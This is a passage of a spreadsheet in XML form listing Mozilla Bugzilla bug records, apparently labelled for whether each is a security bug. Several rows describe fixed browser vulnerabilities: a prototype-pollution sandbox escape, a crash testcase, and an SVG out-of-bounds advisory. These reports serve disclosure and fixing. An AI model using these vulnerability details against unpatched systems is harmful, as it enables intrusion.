 	xul.dll!nsThread::ProcessNextEvent(bool mayWait, bool * result)  Line 657 + 0xe bytes	C++
 	xul.dll!NS_ProcessNextEvent_P(nsIThread * thread, bool mayWait)  Line 245 + 0xd bytes	C++</t>
        </is>
      </c>
      <c r="X2207" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2208">
      <c r="A2208" t="n">
        <v>1770137</v>
      </c>
      <c r="B2208" t="inlineStr">
        <is>
          <t>2022-05-19 04:39:03 -0700</t>
        </is>
      </c>
      <c r="C2208" t="inlineStr">
        <is>
          <t>Spot fix for pwn2own-2022 sandbox escape</t>
        </is>
      </c>
      <c r="D2208" t="inlineStr">
        <is>
          <t>2024-03-21 14:31:37 -0700</t>
        </is>
      </c>
      <c r="E2208" t="n">
        <v>1</v>
      </c>
      <c r="F2208" t="n">
        <v>1</v>
      </c>
      <c r="G2208" t="n">
        <v>6</v>
      </c>
      <c r="H2208" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2208" t="inlineStr">
        <is>
          <t>Toolkit Graveyard</t>
        </is>
      </c>
      <c r="J2208" t="inlineStr">
        <is>
          <t>Notifications and Alerts</t>
        </is>
      </c>
      <c r="K2208" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2208" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2208" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2208" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2208" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2208" t="inlineStr"/>
      <c r="Q2208" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2208" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2208" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T2208" t="n">
        <v>1</v>
      </c>
      <c r="U2208" t="n">
        <v>0</v>
      </c>
      <c r="V2208" t="n">
        <v>21</v>
      </c>
      <c r="W2208" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1770057 +++
This bug is for the sandbox escape portion of the pwn2own-2022, described in section 2.2 of the PDF.
I think the basic, specific issue is that on [this](https://searchfox.org/mozilla-central/rev/4719c903af605c2caeda3bb1ce4edb9ca58bf68e/dom/notification/old/NotificationDB.jsm#361) line of code we use an untrusted string from the content process to index into an Object:
`this.notifications[origin][notification.id] = notification;`
If `origin` is the string `"__proto__"`, then we're now polluting the prototype of Object used by all JSMs, which can be taken advantage of later.</t>
        </is>
      </c>
      <c r="X2208" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2209">
      <c r="A2209" t="n">
        <v>1484753</v>
      </c>
      <c r="B2209" t="inlineStr">
        <is>
          <t>2018-08-20 09:28:09 -0700</t>
        </is>
      </c>
      <c r="C2209" t="inlineStr">
        <is>
          <t>Firefox doesn't mark sites with http favicons as mixed content</t>
        </is>
      </c>
      <c r="D2209" t="inlineStr">
        <is>
          <t>2024-05-30 09:47:51 -0700</t>
        </is>
      </c>
      <c r="E2209" t="n">
        <v>1</v>
      </c>
      <c r="F2209" t="n">
        <v>1</v>
      </c>
      <c r="G2209" t="n">
        <v>2</v>
      </c>
      <c r="H2209" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2209" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2209" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2209" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2209" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2209" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2209" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2209" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2209" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main63+]</t>
        </is>
      </c>
      <c r="Q2209" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2209" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2209" t="inlineStr">
        <is>
          <t>Firefox 63</t>
        </is>
      </c>
      <c r="T2209" t="n">
        <v>1</v>
      </c>
      <c r="U2209" t="n">
        <v>0</v>
      </c>
      <c r="V2209" t="n">
        <v>30</v>
      </c>
      <c r="W2209" t="inlineStr">
        <is>
          <t>Created attachment 9002521
proof.mov
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Steps to reproduce:
1- Open the Firefox
2- Go this website : https://mixed-favicon.badssl.com/
Actual results:
Although a web page icon loads as http, it may appear secure.
proof of concept:
proof.mov
Expected results:
Please look at the https://mixed-favicon.badssl.com's source code. You can see favicon icon as https. But if you open favicon file, it' redirecting to http page. This means : favicon file loading as http. This means : web page is not secure. But Firefox show web page as secure</t>
        </is>
      </c>
      <c r="X2209" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2210">
      <c r="A2210" t="n">
        <v>1221421</v>
      </c>
      <c r="B2210" t="inlineStr">
        <is>
          <t>2015-11-03 21:10:45 -0800</t>
        </is>
      </c>
      <c r="C2210" t="inlineStr">
        <is>
          <t>"Assertion failure: this-&gt;is&lt;T&gt;()" in array_length_getter after changing __proto__ on DOM style object</t>
        </is>
      </c>
      <c r="D2210" t="inlineStr">
        <is>
          <t>2016-07-02 11:32:48 -0700</t>
        </is>
      </c>
      <c r="E2210" t="n">
        <v>1</v>
      </c>
      <c r="F2210" t="n">
        <v>1</v>
      </c>
      <c r="G2210" t="n">
        <v>3</v>
      </c>
      <c r="H2210" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2210" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2210" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2210" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2210" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2210" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2210" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2210" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2210" t="inlineStr">
        <is>
          <t>[adv-main43+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2210" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2210" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2210" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T2210" t="n">
        <v>1</v>
      </c>
      <c r="U2210" t="n">
        <v>0</v>
      </c>
      <c r="V2210" t="n">
        <v>22</v>
      </c>
      <c r="W2210" t="inlineStr">
        <is>
          <t>Created attachment 8682922
browser testcase
Assertion failure: this-&gt;is&lt;T&gt;(), at js/src/jsobj.h:547</t>
        </is>
      </c>
      <c r="X2210" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2211">
      <c r="A2211" t="n">
        <v>1143048</v>
      </c>
      <c r="B2211" t="inlineStr">
        <is>
          <t>2015-03-13 10:24:48 -0700</t>
        </is>
      </c>
      <c r="C2211" t="inlineStr">
        <is>
          <t>Up the default ratelimit for the API</t>
        </is>
      </c>
      <c r="D2211" t="inlineStr">
        <is>
          <t>2015-03-24 09:31:21 -0700</t>
        </is>
      </c>
      <c r="E2211" t="n">
        <v>1</v>
      </c>
      <c r="F2211" t="n">
        <v>1</v>
      </c>
      <c r="G2211" t="n">
        <v>4</v>
      </c>
      <c r="H2211" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2211" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2211" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K2211" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2211" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2211" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2211" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2211" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2211" t="inlineStr"/>
      <c r="Q2211" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2211" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2211" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2211" t="n">
        <v>1</v>
      </c>
      <c r="U2211" t="n">
        <v>0</v>
      </c>
      <c r="V2211" t="n">
        <v>5</v>
      </c>
      <c r="W2211" t="inlineStr">
        <is>
          <t>We're currently using a very very low limit of 10 requests per minute per IP for unauthenticated queries. 
Considering that if you write a webapp, on a domain that is not crash-stats.mozilla.com it won't be able to use your cookie so unless these webapps incorporate tokens, they very quickly run out of the rate limit. 
Note, almost all queries are cached and our hit ratio is probably very low. 
However, perhaps a more realistic use of the ratelimiter is to sit inside the memoization functions of the API views and only increment if it's a cache MISS. That way, if you're a good citizen and use queries that can be highly cached we might as well not bother rate limiting the requests. That might be for a future day.</t>
        </is>
      </c>
      <c r="X2211" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2212">
      <c r="A2212" t="n">
        <v>1469898</v>
      </c>
      <c r="B2212" t="inlineStr">
        <is>
          <t>2018-06-20 08:51:56 -0700</t>
        </is>
      </c>
      <c r="C2212" t="inlineStr">
        <is>
          <t>Heartbeat fails when assuming security is configured in Nginx</t>
        </is>
      </c>
      <c r="D2212" t="inlineStr">
        <is>
          <t>2018-06-20 09:29:09 -0700</t>
        </is>
      </c>
      <c r="E2212" t="n">
        <v>1</v>
      </c>
      <c r="F2212" t="n">
        <v>1</v>
      </c>
      <c r="G2212" t="n">
        <v>4</v>
      </c>
      <c r="H2212" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2212" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2212" t="inlineStr">
        <is>
          <t>Symbols</t>
        </is>
      </c>
      <c r="K2212" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2212" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2212" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2212" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2212" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2212" t="inlineStr"/>
      <c r="Q2212" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2212" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2212" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2212" t="n">
        <v>1</v>
      </c>
      <c r="U2212" t="n">
        <v>0</v>
      </c>
      <c r="V2212" t="n">
        <v>5</v>
      </c>
      <c r="W2212" t="inlineStr">
        <is>
          <t>When relying on dockerflow to do heartbeat checks, it, by default, checks that all the good security headers are taken care of by Django. This breaks Tecken because here we assume that's taken care of by Nginx config in cloudops-deployment.</t>
        </is>
      </c>
      <c r="X2212" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2213">
      <c r="A2213" t="n">
        <v>599607</v>
      </c>
      <c r="B2213" t="inlineStr">
        <is>
          <t>2010-09-25 05:47:25 -0700</t>
        </is>
      </c>
      <c r="C2213" t="inlineStr">
        <is>
          <t>js_MakeArraySlow from 1.9.2 and 1.9.1 is GC-unsafe on 64-bit</t>
        </is>
      </c>
      <c r="D2213" t="inlineStr">
        <is>
          <t>2022-01-26 05:28:57 -0800</t>
        </is>
      </c>
      <c r="E2213" t="n">
        <v>1</v>
      </c>
      <c r="F2213" t="n">
        <v>1</v>
      </c>
      <c r="G2213" t="n">
        <v>3</v>
      </c>
      <c r="H2213" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2213" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2213" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2213" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L2213" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2213" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2213" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2213" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2213" t="inlineStr">
        <is>
          <t>[sg:critical?] impractical attack vector? fixed by bug 575024</t>
        </is>
      </c>
      <c r="Q2213" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2213" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2213" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2213" t="n">
        <v>1</v>
      </c>
      <c r="U2213" t="n">
        <v>0</v>
      </c>
      <c r="V2213" t="n">
        <v>10</v>
      </c>
      <c r="W2213" t="inlineStr">
        <is>
          <t>On 1.9.2 and 1.9.1 branches the dense array capacity can grow beyond JSID_INT_MAX (2**32 - 1) as the capacity limit is set to 2**word_size/sizeof(jsval). Thus on these branches with 64 bit CPU, when js_MakeArraySlow loops over all elements, it may reach indexes that goes beyond JSID_INT_MAX. For such indexes JS_ValueToId convert them into strings. The latter could trigger the last-ditch GC. That GC will collect JSScopeProperty instances that are added to the just created scope since the scope is not reachable through any object leading to a GC hazard.
In practice this can only be exploitable if one can allocate more than 8GB array which requires very high end hardware and patience to wait for an exploit to fill the array before killing the browser.
On the trunk the array capacity limit is set to 2*32/sizeof(jsval) or 2*29 so JS_ValueToId from makeDenseArraySlow cannot allocate any GC things. Still the implementation for the bug 569422 need to be aware of this as the proposed changes there allocates shapes as GC things leading to a possibility of the last-ditch GC for any array.</t>
        </is>
      </c>
      <c r="X2213" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2214">
      <c r="A2214" t="n">
        <v>1096026</v>
      </c>
      <c r="B2214" t="inlineStr">
        <is>
          <t>2014-11-09 05:22:33 -0800</t>
        </is>
      </c>
      <c r="C2214" t="inlineStr">
        <is>
          <t>Assertion failure: !isInside(*pSlotsElems), at gc/Nursery.cpp:481</t>
        </is>
      </c>
      <c r="D2214" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:44 -0700</t>
        </is>
      </c>
      <c r="E2214" t="n">
        <v>1</v>
      </c>
      <c r="F2214" t="n">
        <v>1</v>
      </c>
      <c r="G2214" t="n">
        <v>3</v>
      </c>
      <c r="H2214" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2214" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2214" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2214" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2214" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2214" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2214" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2214" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2214" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main34+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q2214" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2214" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2214" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T2214" t="n">
        <v>1</v>
      </c>
      <c r="U2214" t="n">
        <v>0</v>
      </c>
      <c r="V2214" t="n">
        <v>41</v>
      </c>
      <c r="W2214" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision d380166816dd (run with --no-threads --fuzzing-safe):
gczeal(2);
var Vec3u16Type = TypedObject.uint16.array(3);
function foo_u16() {
  for (var i = 0; i &lt; 30000; i += 3) {
    var vec = new Vec3u16Type([i, i+1, i+2]);
    var sum = vec[0] + vec[1] + vec[(/[]/g )];
    foo_u16(sum, 3*i + 3);
  }
}
foo_u16();</t>
        </is>
      </c>
      <c r="X2214" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2215">
      <c r="A2215" t="n">
        <v>687466</v>
      </c>
      <c r="B2215" t="inlineStr">
        <is>
          <t>2011-09-19 08:23:44 -0700</t>
        </is>
      </c>
      <c r="C2215" t="inlineStr">
        <is>
          <t>puppetize foopys</t>
        </is>
      </c>
      <c r="D2215" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2215" t="n">
        <v>1</v>
      </c>
      <c r="F2215" t="n">
        <v>1</v>
      </c>
      <c r="G2215" t="n">
        <v>5</v>
      </c>
      <c r="H2215" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2215" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2215" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2215" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2215" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2215" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2215" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2215" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2215" t="inlineStr">
        <is>
          <t>[puppet]</t>
        </is>
      </c>
      <c r="Q2215" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2215" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2215" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2215" t="n">
        <v>1</v>
      </c>
      <c r="U2215" t="n">
        <v>0</v>
      </c>
      <c r="V2215" t="n">
        <v>2</v>
      </c>
      <c r="W2215" t="inlineStr">
        <is>
          <t>I just discovered some foopy's with some kill_stalled.sh's with the "kill" line commented out. We should puppetize these to avoid this and other similar problems in the future.</t>
        </is>
      </c>
      <c r="X2215" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2216">
      <c r="A2216" t="n">
        <v>1093195</v>
      </c>
      <c r="B2216" t="inlineStr">
        <is>
          <t>2014-11-03 09:38:33 -0800</t>
        </is>
      </c>
      <c r="C2216" t="inlineStr">
        <is>
          <t>Signature report link from supersearch results doesn't work with a date-limited search</t>
        </is>
      </c>
      <c r="D2216" t="inlineStr">
        <is>
          <t>2014-11-06 08:10:04 -0800</t>
        </is>
      </c>
      <c r="E2216" t="n">
        <v>1</v>
      </c>
      <c r="F2216" t="n">
        <v>1</v>
      </c>
      <c r="G2216" t="n">
        <v>4</v>
      </c>
      <c r="H2216" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2216" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2216" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2216" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2216" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2216" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2216" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2216" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2216" t="inlineStr"/>
      <c r="Q2216" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2216" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2216" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2216" t="n">
        <v>1</v>
      </c>
      <c r="U2216" t="n">
        <v>0</v>
      </c>
      <c r="V2216" t="n">
        <v>7</v>
      </c>
      <c r="W2216" t="inlineStr">
        <is>
          <t>From a supersearch result field, such as this one,
https://crash-stats.mozilla.com/search/?signature=%3DMarkInternal%3CJSString%3E&amp;date=%3E%3D10%2F01%2F2014&amp;_facets=signature&amp;_columns=date&amp;_columns=signature&amp;_columns=product&amp;_columns=version&amp;_columns=build_id&amp;_columns=platform
The "Signature report" link doesn't return me results, but instead this message,
date
    Enter a valid date/time.
The signature report link does work if the supersearch wasn't date-limited.</t>
        </is>
      </c>
      <c r="X2216" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2217">
      <c r="A2217" t="n">
        <v>1302286</v>
      </c>
      <c r="B2217" t="inlineStr">
        <is>
          <t>2016-09-12 18:42:29 -0700</t>
        </is>
      </c>
      <c r="C2217" t="inlineStr">
        <is>
          <t>Remove `_getChildren` from the bookmarks engine</t>
        </is>
      </c>
      <c r="D2217" t="inlineStr">
        <is>
          <t>2016-09-16 14:39:51 -0700</t>
        </is>
      </c>
      <c r="E2217" t="n">
        <v>1</v>
      </c>
      <c r="F2217" t="n">
        <v>1</v>
      </c>
      <c r="G2217" t="n">
        <v>2</v>
      </c>
      <c r="H2217" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2217" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2217" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K2217" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2217" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2217" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2217" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2217" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2217" t="inlineStr"/>
      <c r="Q2217" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2217" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2217" t="inlineStr">
        <is>
          <t>Firefox 51</t>
        </is>
      </c>
      <c r="T2217" t="n">
        <v>1</v>
      </c>
      <c r="U2217" t="n">
        <v>0</v>
      </c>
      <c r="V2217" t="n">
        <v>8</v>
      </c>
      <c r="W2217" t="inlineStr">
        <is>
          <t>`_getChildren` can be replaced with a recursive query in `PlacesSyncUtils`, now that we've moved `getChangeRootIds` out of the tracker patch and into bug 1274496. This function is called `pullAllChanges` in the new tracker, but there's no reason we can't split it out and make the diff smaller.
This also removes a caller of `idForGUID`.</t>
        </is>
      </c>
      <c r="X2217" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2218">
      <c r="A2218" t="n">
        <v>1556083</v>
      </c>
      <c r="B2218" t="inlineStr">
        <is>
          <t>2019-05-31 13:50:57 -0700</t>
        </is>
      </c>
      <c r="C2218" t="inlineStr">
        <is>
          <t>High ANR rate in 68.0b5 for the arm32 apk</t>
        </is>
      </c>
      <c r="D2218" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E2218" t="n">
        <v>1</v>
      </c>
      <c r="F2218" t="n">
        <v>1</v>
      </c>
      <c r="G2218" t="n">
        <v>6</v>
      </c>
      <c r="H2218" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2218" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2218" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2218" t="inlineStr">
        <is>
          <t>Firefox 68</t>
        </is>
      </c>
      <c r="L2218" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2218" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2218" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2218" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2218" t="inlineStr"/>
      <c r="Q2218" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2218" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2218" t="inlineStr">
        <is>
          <t>Firefox 69</t>
        </is>
      </c>
      <c r="T2218" t="n">
        <v>1</v>
      </c>
      <c r="U2218" t="n">
        <v>0</v>
      </c>
      <c r="V2218" t="n">
        <v>26</v>
      </c>
      <c r="W2218" t="inlineStr">
        <is>
          <t>While reviewing the GPC I noticed that there was a notification that the ANR rate was above the accepted threshold. Given the fact that we are on the cusp of going to ESR mode, I thought it was important to file and track this issue.
The top issues in the cluster are:
* Input dispatching timed out (org.mozilla.firefox_beta/org.mozilla.gecko.BrowserApp, Waiting to send non-key event because the touched window has not finished processing certain input events that were delivered to it over 500.0ms ago. Wait queue length: 2. Wait queue head age: 12660.8ms.)
* Broadcast of Intent { act=android.intent.action.SCREEN_OFF flg=0x50200010 (has extras) }</t>
        </is>
      </c>
      <c r="X2218" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2219">
      <c r="A2219" t="n">
        <v>708186</v>
      </c>
      <c r="B2219" t="inlineStr">
        <is>
          <t>2011-12-06 22:31:44 -0800</t>
        </is>
      </c>
      <c r="C2219" t="inlineStr">
        <is>
          <t>[8.0.1] nsSVGValue Out-of-Bounds Access (ZDI-CAN-1414)</t>
        </is>
      </c>
      <c r="D2219" t="inlineStr">
        <is>
          <t>2015-10-07 18:53:13 -0700</t>
        </is>
      </c>
      <c r="E2219" t="n">
        <v>1</v>
      </c>
      <c r="F2219" t="n">
        <v>1</v>
      </c>
      <c r="G2219" t="n">
        <v>3</v>
      </c>
      <c r="H2219" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2219" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2219" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K2219" t="inlineStr">
        <is>
          <t>8 Branch</t>
        </is>
      </c>
      <c r="L2219" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2219" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2219" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2219" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2219" t="inlineStr">
        <is>
          <t>[sg:critical][qa!] fixed in Fx9 by bug 602759</t>
        </is>
      </c>
      <c r="Q2219" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2219" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2219" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T2219" t="n">
        <v>1</v>
      </c>
      <c r="U2219" t="n">
        <v>0</v>
      </c>
      <c r="V2219" t="n">
        <v>34</v>
      </c>
      <c r="W2219" t="inlineStr">
        <is>
          <t>Created attachment 579593
PoC from comment 0
ZDI-CAN-1414: Mozilla Firefox nsSVGValue Out-of-Bounds Access Remote
Code Execution Vulnerability
-- CVSS -----------------------------------------
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
TippingPoint has identified a vulnerability affecting the following
products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Version(s) Tested: Mozilla Firefox 8.0.1
Platform(s) Tested: Windows XP SP3
---------------------
Vulnerability details
---------------------
The notification of nsSVGValue observers via
nsSVGValue::NotifyObservers(SVGObserverNotifyFunction f,
modificationType aModType) uses a loop which can result in an
out-of-bounds access to attacker controlled memory. Provided below the
code for this function from content/src/nsSVGValue.cpp:
nsSVGValue::NotifyObservers(SVGObserverNotifyFunction f,
                            modificationType aModType)
{
  PRInt32 count = mObservers.Length();
  // Since notification might cause the listeners to remove themselves
  // from the observer list (mod_die), walk backwards through the list
  // to catch everyone.
  for (PRInt32 i = count - 1; i &gt;= 0; i--) {
    nsIWeakReference* wr = mObservers.ElementAt(i);
    nsCOMPtr&lt;nsISVGValueObserver&gt; observer = do_QueryReferent(wr);
    if (observer)
       (static_cast&lt;nsISVGValueObserver*&gt;(observer)-&gt;*f)(this, aModType);
  }
}
The variable "count" is set once from mObservers.Length() before the
loop begins. During each loop iteration, a pointer to is acquired via
a call to mObservers.ElementAt(i);. An attacker may register an
observer of nsSVGValue which removes elements from the array, thus
making the "count" reflect an invalid amount of elements. The
mObserver function ElementAt() does not validate that the index is not
out of bounds. The combination of these behaviors means that
subsequent iterations of the loop will access memory which is outside
the bounds of the array. Through manipulation of memory layout, the
